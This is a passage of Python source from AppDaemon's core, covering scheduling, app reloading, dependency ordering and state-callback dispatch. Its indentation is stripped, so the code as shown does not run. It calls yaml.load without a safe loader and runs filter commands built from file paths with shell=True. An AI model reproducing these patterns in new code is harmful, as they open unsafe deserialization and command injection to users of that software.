self.schedule[name].keys(),
key=lambda uuid_: self.schedule[name][uuid_]["timestamp"]
):
self.diag(
"INFO",
" Timestamp: {} - data: {}".format(
time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(
self.schedule[name][entry]["timestamp"]
)),
self.schedule[name][entry]
)
)
self.diag("INFO", "--------------------------------------------------")
async def do_every(self, period, f):
#
# We already set self.now for DST calculation and initial sunset,
# but let's reset it at the start of the timer loop to avoid an initial clock skew
#
if self.starttime:
self.now = datetime.datetime.strptime(self.starttime, "%Y-%m-%d %H:%M:%S").timestamp()
else:
self.now = datetime.datetime.now().timestamp()
t = math.floor(self.now)
count = 0
t_ = math.floor(time.time())
while not self.stopping:
count += 1
delay = max(t_ + count * period - time.time(), 0)
await asyncio.sleep(delay)
t += self.interval
r = await f(t)
if r is not None and r != t:
# print("r: {}, t: {}".format(r,t))
t = r
t_ = r
count = 0
#
# Scheduler Loop
#
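# One scheduler tick: advance the internal clock to "utc", stop if the configured end
# time is reached, reset on clock skew in realtime mode, refresh sun times, reload all
# apps on a DST transition, then run every schedule entry whose timestamp has passed.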
# noinspection PyBroadException
async def do_every_tick(self, utc):
try:
start_time = datetime.datetime.now().timestamp()
self.now = utc
# If we have reached endtime bail out
if self.endtime is not None and self.get_now() >= self.endtime:
self.log("INFO", "End time reached, exiting")
if self.stop_function is not None:
self.stop_function()
else:
#
# We aren't in a standalone environment so the best we can do is terminate the AppDaemon parts
#
self.stop()
if self.realtime:
real_now = datetime.datetime.now().timestamp()
delta = abs(utc - real_now)
if delta > self.max_clock_skew:
self.log("WARNING",
"Scheduler clock skew detected - delta = {} - resetting".format(delta))
return real_now
# Update sunrise/sunset etc.
self.update_sun()
# Check if we have entered or exited DST - if so, reload apps
# to ensure all time callbacks are recalculated
now_dst = self.is_dst()
if now_dst != self.was_dst:
self.log(
"INFO",
"Detected change in DST from {} to {} -"
" reloading all modules".format(self.was_dst, now_dst)
)
# dump_schedule()
self.log("INFO", "-" * 40)
await utils.run_in_executor(self.loop, self.executor, self.check_app_updates, "__ALL__")
# dump_schedule()
self.was_dst = now_dst
# dump_schedule()
# test code for clock skew
# if random.randint(1, 10) == 5:
# time.sleep(random.randint(1,20))
# Process callbacks
# self.log("DEBUG", "Scheduler invoked at {}".format(now))
with self.schedule_lock:
for name in self.schedule.keys():
for entry in sorted(
self.schedule[name].keys(),
key=lambda uuid_: self.schedule[name][uuid_]["timestamp"]
):
if self.schedule[name][entry]["timestamp"] <= utc:
self.exec_schedule(name, entry, self.schedule[name][entry])
else:
break
for k, v in list(self.schedule.items()):
if v == {}:
del self.schedule[k]
end_time = datetime.datetime.now().timestamp()
loop_duration = (int((end_time - start_time) * 1000) / 1000) * 1000
self.log("DEBUG", "Scheduler loop compute time: {}ms".format(loop_duration))
if loop_duration > 900:
self.log("WARNING", "Excessive time spent in scheduler loop: {}ms".format(loop_duration))
return utc
except:
self.err("WARNING", '-' * 60)
self.err("WARNING", "Unexpected error during do_every_tick()")
self.err("WARNING", '-' * 60)
self.err( "WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
# When explicitly logging to stdout and stderr, suppress
# verbose_log messages about writing an error (since they show up anyway)
self.log(
"WARNING",
"Logged an error to {}".format(self.errfile)
)
def process_meta(self, meta, namespace):
if meta is not None:
for key in self.required_meta:
if getattr(self, key) is None:
if key in meta:
# We have a value so override
setattr(self, key, meta[key])
def get_plugin_from_namespace(self, namespace):
if self.plugins is not None:
for name in self.plugins:
if "namespace" in self.plugins[name] and self.plugins[name]["namespace"] == namespace:
return name
if "namespace" not in self.plugins[name] and namespace == "default":
return name
else:
return None
async def notify_plugin_started(self, namespace, first_time=False):
try:
self.last_plugin_state[namespace] = datetime.datetime.now()
meta = await self.plugin_objs[namespace].get_metadata()
self.process_meta(meta, namespace)
if not self.stopping:
self.plugin_meta[namespace] = meta
state = await self.plugin_objs[namespace].get_complete_state()
with self.state_lock:
self.state[namespace] = state
if not first_time:
await utils.run_in_executor(self.loop, self.executor, self.check_app_updates, self.get_plugin_from_namespace(namespace))
else:
self.log("INFO", "Got initial state from namespace {}".format(namespace))
self.process_event("global", {"event_type": "plugin_started".format(namespace), "data": {"name": namespace}})
except:
self.err("WARNING", '-' * 60)
self.err("WARNING", "Unexpected error during notify_plugin_started()")
self.err("WARNING", '-' * 60)
self.err("WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
# When explicitly logging to stdout and stderr, suppress
# verbose_log messages about writing an error (since they show up anyway)
self.log(
"WARNING",
"Logged an error to {}".format(self.errfile)
)
def notify_plugin_stopped(self, namespace):
self.process_event("global", {"event_type": "plugin_stopped".format(namespace), "data": {"name": namespace}})
#
# Utility Loop
#
async def utility(self):
#
# Wait for all plugins to initialize
#
initialized = False
while not initialized and self.stopping is False:
initialized = True
for plugin in self.plugin_objs:
if not self.plugin_objs[plugin].active():
initialized = False
break
await asyncio.sleep(1)
# Check if we need to bail due to missing metadata
for key in self.required_meta:
if getattr(self, key) is None:
# No value so bail
self.err("ERROR", "Required attribute not set or obtainable from any plugin: {}".format(key))
self.err("ERROR", "AppDaemon is terminating")
self.stop()
if not self.stopping:
#
# All plugins are loaded and we have initial state
#
if self.starttime:
new_now = datetime.datetime.strptime(self.starttime, "%Y-%m-%d %H:%M:%S")
self.log("INFO", "Starting time travel ...")
self.log("INFO", "Setting clocks to {}".format(new_now))
self.now = new_now.timestamp()
else:
self.now = datetime.datetime.now().timestamp()
self.thread_info["max_used"] = 0
self.thread_info["max_used_time"] = self.now
# Take a note of DST
self.was_dst = self.is_dst()
# Setup sun
self.init_sun()
self.update_sun()
# Create timer loop
self.log("DEBUG", "Starting timer loop")
self.loop.create_task(self.do_every(self.tick, self.do_every_tick))
if self.apps:
self.log("DEBUG", "Reading Apps")
await utils.run_in_executor(self.loop, self.executor, self.check_app_updates)
self.log("INFO", "App initialization complete")
#
# Fire APPD Started Event
#
self.process_event("global", {"event_type": "appd_started", "data": {}})
while not self.stopping:
start_time = datetime.datetime.now().timestamp()
try:
if self.apps:
if self.production_mode is False:
# Check to see if config has changed
await utils.run_in_executor(self.loop, self.executor, self.check_app_updates)
# Call me suspicious, but let's update state from the plugins periodically
# in case we miss events for whatever reason
# Every 10 minutes seems like a good place to start
for plugin in self.plugin_objs:
if self.plugin_objs[plugin].active():
if datetime.datetime.now() - self.last_plugin_state[plugin] > datetime.timedelta(
minutes=10):
try:
self.log("DEBUG",
"Refreshing {} state".format(plugin))
state = await self.plugin_objs[plugin].get_complete_state()
with self.state_lock:
self.state[plugin] = state
self.last_plugin_state[plugin] = datetime.datetime.now()
except:
self.log("WARNING",
"Unexpected error refreshing {} state - retrying in 10 minutes".format(plugin))
# Check for thread starvation
qsize = self.q.qsize()
if qsize > 0 and qsize % 10 == 0:
self.log("WARNING", "Queue size is {}, suspect thread starvation".format(self.q.qsize()))
self.dump_threads()
# Run utility for each plugin
for plugin in self.plugin_objs:
self.plugin_objs[plugin].utility()
except:
self.err("WARNING", '-' * 60)
self.err("WARNING", "Unexpected error during utility()")
self.err("WARNING", '-' * 60)
self.err("WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
# When explicitly logging to stdout and stderr, suppress
# verbose_log messages about writing an error (since they show up anyway)
self.log(
"WARNING",
"Logged an error to {}".format(self.errfile)
)
end_time = datetime.datetime.now().timestamp()
loop_duration = (int((end_time - start_time) * 1000) / 1000) * 1000
self.log("DEBUG", "Util loop compute time: {}ms".format(loop_duration))
if loop_duration > (self.max_utility_skew * 1000):
self.log("WARNING", "Excessive time spent in utility loop: {}ms".format(loop_duration))
if self.check_app_updates_profile is True:
self.diag("INFO", "Profile information for Utility Loop")
self.diag("INFO", self.check_app_updates_profile_stats)
await asyncio.sleep(self.utility_delay)
#
# Stopping, so terminate apps.
#
self.check_app_updates(exit=True)
#
# AppDaemon API
#
def register_endpoint(self, cb, name):
handle = uuid.uuid4()
with self.endpoints_lock:
if name not in self.endpoints:
self.endpoints[name] = {}
self.endpoints[name][handle] = {"callback": cb, "name": name}
return handle
def unregister_endpoint(self, handle, name):
with self.endpoints_lock:
if name in self.endpoints and handle in self.endpoints[name]:
del self.endpoints[name][handle]
#
# App Management
#
def get_app(self, name):
with self.objects_lock:
if name in self.objects:
return self.objects[name]["object"]
else:
return None
def term_object(self, name):
with self.objects_lock:
term = None
if name in self.objects and hasattr(self.objects[name]["object"], "terminate"):
self.log("INFO", "Calling terminate() for {}".format(name))
# Call terminate directly rather than via worker thread
# so we know terminate has completed before we move on
term = self.objects[name]["object"].terminate
if term is not None:
try:
term()
except:
self.err("WARNING", '-' * 60)
self.err("WARNING", "Unexpected error running terminate() for {}".format(name))
self.err("WARNING", '-' * 60)
self.err("WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
self.log("WARNING", "Logged an error to {}".format(self.errfile))
with self.objects_lock:
if name in self.objects:
del self.objects[name]
self.log("DEBUG", "Clearing callbacks for {}".format(name))
with self.callbacks_lock:
if name in self.callbacks:
del self.callbacks[name]
with self.schedule_lock:
if name in self.schedule:
del self.schedule[name]
with self.endpoints_lock:
if name in self.endpoints:
del self.endpoints[name]
def init_object(self, name):
app_args = self.app_config[name]
self.log("INFO",
"Initializing app {} using class {} from module {}".format(name, app_args["class"], app_args["module"]))
if self.get_file_from_module(app_args["module"]) is not None:
with self.objects_lock:
modname = __import__(app_args["module"])
app_class = getattr(modname, app_args["class"])
self.objects[name] = {
"object": app_class(
self, name, self.logger, self.error, app_args, self.config, self.app_config, self.global_vars
),
"id": uuid.uuid4()
}
init = self.objects[name]["object"].initialize
# Call its initialize function
try:
init()
except:
self.err("WARNING", '-' * 60)
self.err("WARNING", "Unexpected error running initialize() for {}".format(name))
self.err("WARNING", '-' * 60)
self.err("WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
self.log("WARNING", "Logged an error to {}".format(self.errfile))
else:
self.log("WARNING", "Unable to find module module {} - {} is not initialized".format(app_args["module"], name))
def read_config(self):
new_config = None
if os.path.isfile(self.app_config_file):
self.log("WARNING", "apps.yaml in the Config directory is deprecated. Please move apps.yaml to the apps directory.")
new_config = self.read_config_file(self.app_config_file)
else:
for root, subdirs, files in os.walk(self.app_dir):
subdirs[:] = [d for d in subdirs if d not in self.exclude_dirs]
if root[-11:] != "__pycache__":
for file in files:
if file[-5:] == ".yaml":
self.log("DEBUG", "Reading {}".format(os.path.join(root, file)))
config = self.read_config_file(os.path.join(root, file))
valid_apps = {}
if type(config).__name__ == "dict":
for app in config:
if config[app] is not None:
if app == "global_modules":
valid_apps[app] = config[app]
elif "class" in config[app] and "module" in config[app]:
valid_apps[app] = config[app]
else:
if self.invalid_yaml_warnings:
self.log("WARNING",
"App '{}' missing 'class' or 'module' entry - ignoring".format(app))
else:
if self.invalid_yaml_warnings:
self.log("WARNING",
"File '{}' invalid structure - ignoring".format(os.path.join(root, file)))
if new_config is None:
new_config = {}
for app in valid_apps:
if app in new_config:
self.log("WARNING",
"File '{}' duplicate app: {} - ignoring".format(os.path.join(root, file), app))
else:
new_config[app] = valid_apps[app]
return new_config
def check_later_app_configs(self, last_latest):
if os.path.isfile(self.app_config_file):
ts = os.path.getmtime(self.app_config_file)
return {"latest": ts, "files": [{"name": self.app_config_file, "ts": os.path.getmtime(self.app_config_file)}]}
else:
later_files = {}
app_config_files = []
later_files["files"] = []
later_files["latest"] = last_latest
later_files["deleted"] = []
for root, subdirs, files in os.walk(self.app_dir):
subdirs[:] = [d for d in subdirs if d not in self.exclude_dirs]
if root[-11:] != "__pycache__":
for file in files:
if file[-5:] == ".yaml":
path = os.path.join(root, file)
app_config_files.append(path)
ts = os.path.getmtime(path)
if ts > last_latest:
later_files["files"].append(path)
if ts > later_files["latest"]:
later_files["latest"] = ts
for file in self.app_config_files:
if file not in app_config_files:
later_files["deleted"].append(file)
for file in app_config_files:
if file not in self.app_config_files:
later_files["files"].append(file)
self.app_config_files = app_config_files
return later_files
def read_config_file(self, file):
new_config = None
try:
with open(file, 'r') as yamlfd:
config_file_contents = yamlfd.read()
try:
new_config = yaml.load(config_file_contents)
except yaml.YAMLError as exc:
self.log("WARNING", "Error loading configuration")
if hasattr(exc, 'problem_mark'):
if exc.context is not None:
self.log("WARNING", "parser says")
self.log("WARNING", str(exc.problem_mark))
self.log("WARNING", str(exc.problem) + " " + str(exc.context))
else:
self.log("WARNING", "parser says")
self.log("WARNING", str(exc.problem_mark))
self.log("WARNING", str(exc.problem))
return new_config
except:
self.err("WARNING", '-' * 60)
self.err("WARNING", "Unexpected error loading config file: {}".format(file))
self.err("WARNING", '-' * 60)
self.err("WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
self.log("WARNING", "Logged an error to {}".format(self.errfile))
# noinspection PyBroadException
def check_config(self):
terminate_apps = {}
initialize_apps = {}
try:
latest = self.check_later_app_configs(self.app_config_file_modified)
self.app_config_file_modified = latest["latest"]
if latest["files"] or latest["deleted"]:
self.log("INFO", "Reading config")
new_config = self.read_config()
if new_config is None:
self.log("WARNING", "New config not applied")
return
for file in latest["deleted"]:
self.log("INFO", "{} deleted".format(file))
for file in latest["files"]:
self.log("INFO", "{} added or modified".format(file))
# Check for changes
for name in self.app_config:
if name in new_config:
if self.app_config[name] != new_config[name]:
# Something changed, clear and reload
self.log("INFO", "App '{}' changed".format(name))
terminate_apps[name] = 1
initialize_apps[name] = 1
else:
# Section has been deleted, clear it out
self.log("INFO", "App '{}' deleted".format(name))
#
# Since the entry has been deleted we can't sensibly determine dependencies
# So just immediately terminate it
#
self.term_object(name)
for name in new_config:
if name not in self.app_config:
#
# New section added!
#
if "class" in new_config[name] and "module" in new_config[name]:
self.log("INFO", "App '{}' added".format(name))
initialize_apps[name] = 1
elif name == "global_modules":
pass
else:
if self.invalid_yaml_warnings:
self.log("WARNING", "App '{}' missing 'class' or 'module' entry - ignoring".format(name))
self.app_config = new_config
return {"init": initialize_apps, "term": terminate_apps}
except:
self.err("WARNING", '-' * 60)
self.err("WARNING", "Unexpected error:")
self.err("WARNING", '-' * 60)
self.err("WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
self.log("WARNING", "Logged an error to {}".format(self.errfile))
def get_app_from_file(self, file):
module = self.get_module_from_path(file)
for app in self.app_config:
if "module" in self.app_config[app] and self.app_config[app]["module"] == module:
return app
return None
# noinspection PyBroadException
def read_app(self, file, reload=False):
name = os.path.basename(file)
module_name = os.path.splitext(name)[0]
# Import the App
if reload:
self.log("INFO", "Reloading Module: {}".format(file))
file, ext = os.path.splitext(name)
#
# Reload
#
try:
importlib.reload(self.modules[module_name])
except KeyError:
if module_name not in sys.modules:
# Probably failed to compile on initial load
# so we need to re-import not reload
self.read_app(file)
else:
# A real KeyError!
raise
else:
app = self.get_app_from_file(file)
if app is not None:
self.log("INFO", "Loading App Module: {}".format(file))
self.modules[module_name] = importlib.import_module(module_name)
elif "global_modules" in self.app_config and module_name in self.app_config["global_modules"]:
self.log("INFO", "Loading Global Module: {}".format(file))
self.modules[module_name] = importlib.import_module(module_name)
else:
if self.missing_app_warnings:
self.log("WARNING", "No app description found for: {} - ignoring".format(file))
@staticmethod
def get_module_from_path(path):
name = os.path.basename(path)
module_name = os.path.splitext(name)[0]
return module_name
def get_file_from_module(self, mod):
for file in self.monitored_files:
module_name = self.get_module_from_path(file)
if module_name == mod:
return file
return None
def process_filters(self):
if "filters" in self.config:
for filter in self.config["filters"]:
for root, subdirs, files in os.walk(self.app_dir, topdown=True):
# print(root, subdirs, files)
#
# Prune dir list
#
subdirs[:] = [d for d in subdirs if d not in self.exclude_dirs]
ext = filter["input_ext"]
extlen = len(ext) * -1
for file in files:
run = False
if file[extlen:] == ext:
infile = os.path.join(root, file)
modified = os.path.getmtime(infile)
if infile in self.filter_files:
if self.filter_files[infile] < modified:
run = True
else:
self.log("INFO", "Found new filter file {}".format(infile))
run = True
if run is True:
filtered = True
self.log("INFO", "Running filter on {}".format(infile))
self.filter_files[infile] = modified
# Run the filter
outfile = utils.rreplace(infile, ext, filter["output_ext"], 1)
command_line = filter["command_line"].replace("$1", infile)
command_line = command_line.replace("$2", outfile)
try:
p = subprocess.Popen(command_line, shell=True)
except:
self.log("WARNING", '-' * 60)
self.log("WARNING", "Unexpected running filter on: {}:".format(infile))
self.log("WARNING", '-' * 60)
self.log("WARNING", traceback.format_exc())
self.log("WARNING", '-' * 60)
@staticmethod
def file_in_modules(file, modules):
for mod in modules:
if mod["name"] == file:
return True
return False
#@_timeit
def check_app_updates(self, plugin=None, exit=False):
if not self.apps:
return
# Lets add some profiling
pr = None
if self.check_app_updates_profile is True:
pr = cProfile.Profile()
pr.enable()
# Process filters
self.process_filters()
# Get list of apps we need to terminate and/or initialize
apps = self.check_config()
found_files = []
modules = []
for root, subdirs, files in os.walk(self.app_dir, topdown=True):
# print(root, subdirs, files)
#
# Prune dir list
#
subdirs[:] = [d for d in subdirs if d not in self.exclude_dirs]
if root[-11:] != "__pycache__":
if root not in self.module_dirs:
self.log("INFO", "Adding {} to module import path".format(root))
sys.path.insert(0, root)
self.module_dirs.append(root)
for file in files:
if file[-3:] == ".py":
found_files.append(os.path.join(root, file))
for file in found_files:
if file == os.path.join(self.app_dir, "__init__.py"):
continue
try:
# check we can actually open the file
fh = open(file)
fh.close()
modified = os.path.getmtime(file)
if file in self.monitored_files:
if self.monitored_files[file] < modified:
modules.append({"name": file, "reload": True})
self.monitored_files[file] = modified
else:
self.log("DEBUG", "Found module {}".format(file))
modules.append({"name": file, "reload": False})
self.monitored_files[file] = modified
except IOError as err:
self.log("WARNING",
"Unable to read app {}: {} - skipping".format(file, err))
# Check for deleted modules and add them to the terminate list
deleted_modules = []
for file in self.monitored_files:
if file not in found_files or exit is True:
deleted_modules.append(file)
self.log("INFO", "Removing module {}".format(file))
for file in deleted_modules:
del self.monitored_files[file]
for app in self.apps_per_module(self.get_module_from_path(file)):
apps["term"][app] = 1
# Add any apps we need to reload because of file changes
for module in modules:
for app in self.apps_per_module(self.get_module_from_path(module["name"])):
if module["reload"]:
apps["term"][app] = 1
apps["init"][app] = 1
if "global_modules" in self.app_config:
for gm in utils.single_or_list(self.app_config["global_modules"]):
if gm == self.get_module_from_path(module["name"]):
for app in self.apps_per_global_module(gm):
if module["reload"]:
apps["term"][app] = 1
apps["init"][app] = 1
if plugin is not None:
self.log("INFO", "Processing restart for {}".format(plugin))
# This is a restart of one of the plugins so check which apps need to be restarted
for app in self.app_config:
reload = False
if app == "global_modules":
continue
if "plugin" in self.app_config[app]:
for this_plugin in utils.single_or_list(self.app_config[app]["plugin"]):
if this_plugin == plugin:
# We got a match so do the reload
reload = True
break
elif plugin == "__ALL__":
reload = True
break
else:
# No plugin dependency specified, reload to err on the side of caution
reload = True
if reload is True:
apps["term"][app] = 1
apps["init"][app] = 1
# Terminate apps
if apps is not None and apps["term"]:
prio_apps = self.get_app_deps_and_prios(apps["term"])
for app in sorted(prio_apps, key=prio_apps.get, reverse=True):
try:
self.log("INFO", "Terminating {}".format(app))
self.term_object(app)
except:
self.err("WARNING", '-' * 60)
self.err("WARNING", "Unexpected error terminating app: {}:".format(app))
self.err("WARNING", '-' * 60)
self.err("WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
self.log("WARNING", "Logged an error to {}".format(self.errfile))
# Load/reload modules
for mod in modules:
try:
self.read_app(mod["name"], mod["reload"])
except:
self.err("WARNING", '-' * 60)
self.err("WARNING", "Unexpected error loading module: {}:".format(mod["name"]))
self.err("WARNING", '-' * 60)
self.err("WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
self.log("WARNING", "Unexpected error loading module: {}:".format(mod["name"]))
self.log("WARNING", "Removing associated apps:")
module = self.get_module_from_path(mod["name"])
for app in self.app_config:
if self.app_config[app]["module"] == module:
if apps["init"] and app in apps["init"]:
del apps["init"][app]
self.log("WARNING", "{}".format(app))
if apps is not None and apps["init"]:
prio_apps = self.get_app_deps_and_prios(apps["init"])
# Initialize Apps
for app in sorted(prio_apps, key=prio_apps.get):
try:
self.init_object(app)
except:
self.err("WARNING", '-' * 60)
self.err("WARNING", "Unexpected error initializing app: {}:".format(app))
self.err("WARNING", '-' * 60)
self.err("WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
self.log("WARNING", "Logged an error to {}".format(self.errfile))
if self.check_app_updates_profile is True:
pr.disable()
s = io.StringIO()
sortby = 'cumulative'
ps = pstats.Stats(pr, stream=s).sort_stats(sortby)
ps.print_stats()
self.check_app_updates_profile_stats = s.getvalue()
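# Expand the requested apps with everything that depends on them, topologically sort
# the full app config, and assign load priorities: apps involved in dependencies get
# ascending priorities starting just above 50, others use their configured "priority"
# (default 50). Only the apps in the expanded request list are returned.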
def get_app_deps_and_prios(self, applist):
# Build a list of modules and their dependencies
deplist = []
for app in applist:
if app not in deplist:
deplist.append(app)
self.get_dependent_apps(app, deplist)
# Need to give the topological sort a full list of apps or it will fail
full_list = list(self.app_config.keys())
deps = []
for app in full_list:
dependees = []
if "dependencies" in self.app_config[app]:
for dep in utils.single_or_list(self.app_config[app]["dependencies"]):
if dep in self.app_config:
dependees.append(dep)
else:
self.log("WARNING", "Unable to find app {} in dependencies for {}".format(dep, app))
self.log("WARNING", "Ignoring app {}".format(app))
deps.append((app, dependees))
prio_apps = {}
prio = float(50.1)
try:
for app in self.topological_sort(deps):
if "dependencies" in self.app_config[app] or self.app_has_dependents(app):
prio_apps[app] = prio
prio += float(0.0001)
else:
if "priority" in self.app_config[app]:
prio_apps[app] = float(self.app_config[app]["priority"])
else:
prio_apps[app] = float(50)
except ValueError:
pass
# now we remove the ones we aren't interested in
final_apps = {}
for app in prio_apps:
if app in deplist:
final_apps[app] = prio_apps[app]
return final_apps
def app_has_dependents(self, name):
for app in self.app_config:
if "dependencies" in self.app_config[app]:
for dep in utils.single_or_list(self.app_config[app]["dependencies"]):
if dep == name:
return True
return False
def get_dependent_apps(self, dependee, deps):
for app in self.app_config:
if "dependencies" in self.app_config[app]:
for dep in utils.single_or_list(self.app_config[app]["dependencies"]):
#print("app= {} dep = {}, dependee = {} deps = {}".format(app, dep, dependee, deps))
if dep == dependee and app not in deps:
deps.append(app)
# recursion mutates deps in place
self.get_dependent_apps(app, deps)
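# Layered (Kahn-style) topological sort over (name, dependencies) pairs: each pass
# yields every entry whose remaining dependencies have already been emitted; if a
# pass emits nothing, the leftover entries form a cycle (or reference missing apps)
# and a ValueError is raised after logging the offenders.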
def topological_sort(self, source):
pending = [(name, set(deps)) for name, deps in source] # copy deps so we can modify set in-place
emitted = []
while pending:
next_pending = []
next_emitted = []
for entry in pending:
name, deps = entry
deps.difference_update(emitted) # remove deps we emitted last pass
if deps: # still has deps? recheck during next pass
next_pending.append(entry)
else: # no more deps? time to emit
yield name
emitted.append(name) # <-- not required, but helps preserve original ordering
next_emitted.append(name) # remember what we emitted for difference_update() in next pass
if not next_emitted:
# all remaining entries have unmet deps, which means there is a
# cyclic or missing dependency among the configured apps
self.log("WARNING", "Cyclic or missing app dependencies detected")
for pend in next_pending:
deps = ""
for dep in pend[1]:
deps += "{} ".format(dep)
self.log("WARNING", "{} depends on {}".format(pend[0], deps))
raise ValueError("cyclic dependancy detected")
pending = next_pending
emitted = next_emitted
def apps_per_module(self, module):
apps = []
for app in self.app_config:
if app != "global_modules" and self.app_config[app]["module"] == module:
apps.append(app)
return apps
def apps_per_global_module(self, module):
apps = []
for app in self.app_config:
if "global_dependencies" in self.app_config[app]:
for gm in utils.single_or_list(self.app_config[app]["global_dependencies"]):
if gm == module:
apps.append(app)
return apps
#
# State Updates
#
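# Decide whether a state change should fire this callback: attribute "all" dispatches
# unconditionally; otherwise the old/new attribute values are compared against the
# optional "old"/"new" constraints. A "duration" kwarg defers dispatch via a one-shot
# schedule entry instead of firing immediately, and that pending timer is cancelled
# if the constraints stop matching.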
def check_and_dispatch(self, name, funcref, entity, attribute, new_state,
old_state, cold, cnew, kwargs, uuid_):
kwargs["handle"] = uuid_
if attribute == "all":
with self.objects_lock:
self.dispatch_worker(name, {
"name": name,
"id": self.objects[name]["id"],
"type": "attr",
"function": funcref,
"attribute": attribute,
"entity": entity,
"new_state": new_state,
"old_state": old_state,
"kwargs": kwargs,
})
else:
if old_state is None:
old = None
else:
if attribute in old_state:
old = old_state[attribute]
elif 'attributes' in old_state and attribute in old_state['attributes']:
old = old_state['attributes'][attribute]
else:
old = None
if new_state is None:
new = None
else:
if attribute in new_state:
new = new_state[attribute]
elif 'attributes' in new_state and attribute in new_state['attributes']:
new = new_state['attributes'][attribute]
else:
new = None
if (cold is None or cold == old) and (cnew is None or cnew == new):
if "duration" in kwargs:
# Set a timer
exec_time = self.get_now_ts() + int(kwargs["duration"])
kwargs["_duration"] = self.insert_schedule(
name, exec_time, funcref, False, None,
entity=entity,
attribute=attribute,
old_state=old,
new_state=new, **kwargs
)
else:
# Do it now
with self.objects_lock:
self.dispatch_worker(name, {
"name": name,
"id": self.objects[name]["id"],
"type": "attr",
"function": funcref,
"attribute": attribute,
"entity": entity,
"new_state": new,
"old_state": old,
"kwargs": kwargs
})
else:
if "_duration" in kwargs:
# cancel timer
self.cancel_timer(name, kwargs["_duration"])
def process_state_change(self, namespace, state):
data = state["data"]
entity_id = data['entity_id']
self.log("DEBUG", data)
device, entity = entity_id.split(".")
# Process state callbacks
removes = []
with self.callbacks_lock:
for name in self.callbacks.keys():
for uuid_ in self.callbacks[name]:
callback = self.callbacks[name][uuid_]
if callback["type"] == "state" and (callback["namespace"] == namespace or callback["namespace"] == "global" or namespace == "global"):
cdevice = None
centity = None
if callback["entity"] is not None:
if "." not in callback["entity"]:
cdevice = callback["entity"]
centity = None
else:
cdevice, centity = callback["entity"].split(".")
if callback["kwargs"].get("attribute") is None:
cattribute = "state"
else:
cattribute = callback["kwargs"].get("attribute")
cold = callback["kwargs"].get("old")
cnew = callback["kwargs"].get("new")
if cdevice is None:
self.check_and_dispatch(
name, callback["function"], entity_id,
cattribute,
data['new_state'],
data['old_state'],
cold, cnew,
callback["kwargs"],
uuid_
)
elif centity is None:
if device == cdevice:
self.check_and_dispatch(
name, callback["function"], entity_id,
cattribute,
data['new_state'],
data['old_state'],
cold, cnew,
callback["kwargs"],
uuid_
)
elif device == cdevice and entity == centity:
self.check_and_dispatch(
name, callback["function"], entity_id,
cattribute,
data['new_state'],
data['old_state'], cold,
cnew,
callback["kwargs"],
uuid_
)
# Remove the callback if appropriate
remove = callback["kwargs"].get("oneshot", False)
if remove:
removes.append({"name": callback["name"], "uuid": callback["kwargs"]["handle"]})
for remove in removes:
#print(remove)
self.cancel_state_callback(remove["uuid"], remove["name"])
async def state_update(self, namespace, data):
try:
self.log(
"DEBUG",
"Event type:{}:".format(data['event_type'])
)
self.log( "DEBUG", data["data"])
if data['event_type'] == "state_changed":
entity_id = data['data']['entity_id']
# First update our global state
with self.state_lock:
self.state[namespace][entity_id] = data['data']['new_state']
if self.apps is True:
# Process state changed message
if data['event_type'] == "state_changed":
self.process_state_change(namespace, data)
else:
# Process non-state callbacks
self.process_event(namespace, data)
# Update dashboards
if self.dashboard is not None:
await self.dashboard.ws_update(namespace, data)
except:
self.log("WARNING", '-' * 60)
self.log("WARNING", "Unexpected error during state_update()")
self.log("WARNING", '-' * 60)
self.log("WARNING", traceback.format_exc())
self.log("WARNING", '-' * 60)
#
# Event Update
#
def process_event(self, namespace, data):
with self.callbacks_lock:
for name in self.callbacks.keys():
for uuid_ in self.callbacks[name]:
callback = self.callbacks[name][uuid_]
if callback["namespace"] == namespace or callback["namespace"] == "global" or namespace == "global":
if "event" in callback and (
callback["event"] is None
or data['event_type'] == callback["event"]):
# Check any filters
_run = True
for key in callback["kwargs"]:
if key in data["data"] and callback["kwargs"][key] != \
data["data"][key]:
_run = False
if _run:
with self.objects_lock:
self.dispatch_worker(name, {
"name": name,
"id": self.objects[name]["id"],
"type": "event",
"event": data['event_type'],
"function": callback["function"],
"data": data["data"],
"kwargs": callback["kwargs"]
})
#
# Plugin Management
#
def get_plugin(self, name):
if name in self.plugin_objs:
return self.plugin_objs[name]
else:
return None
def get_plugin_meta(self, namespace):
for name in self.plugins:
if "namespace" not in self.plugins[name] and namespace == "default":
return self.plugin_meta[namespace]
elif "namespace" in self.plugins[name] and self.plugins[name]["namespace"] == namespace:
return self.plugin_meta[namespace]
return None
#
# Utilities
#
def sanitize_state_kwargs(self, app, kwargs):
kwargs_copy = kwargs.copy()
return self._sanitize_kwargs(kwargs_copy, [
"old", "new", "attribute", "duration", "state",
"entity", "_duration", "old_state", "new_state",
"oneshot"
] + app.list_constraints())
def sanitize_timer_kwargs(self, app, kwargs):
kwargs_copy = kwargs.copy()
return self._sanitize_kwargs(kwargs_copy, [
"interval", "constrain_days", "constrain_input_boolean",
] + app.list_constraints())
def _sanitize_kwargs(self, kwargs, keys):
for key in keys:
if key in kwargs:
del kwargs[key]
return kwargs
def log(self, level, message, name="AppDaemon"):
if not self.realtime:
ts = self.get_now()
else:
ts = None
utils.log(self.logger, level, message, name, ts)
def err(self, level, message, name="AppDaemon"):
if not self.realtime:
ts = self.get_now()
else:
ts = None
utils.log(self.error, level, message, name, ts)
def diag(self, level, message, name="AppDaemon"):
if not self.realtime:
ts = self.get_now()
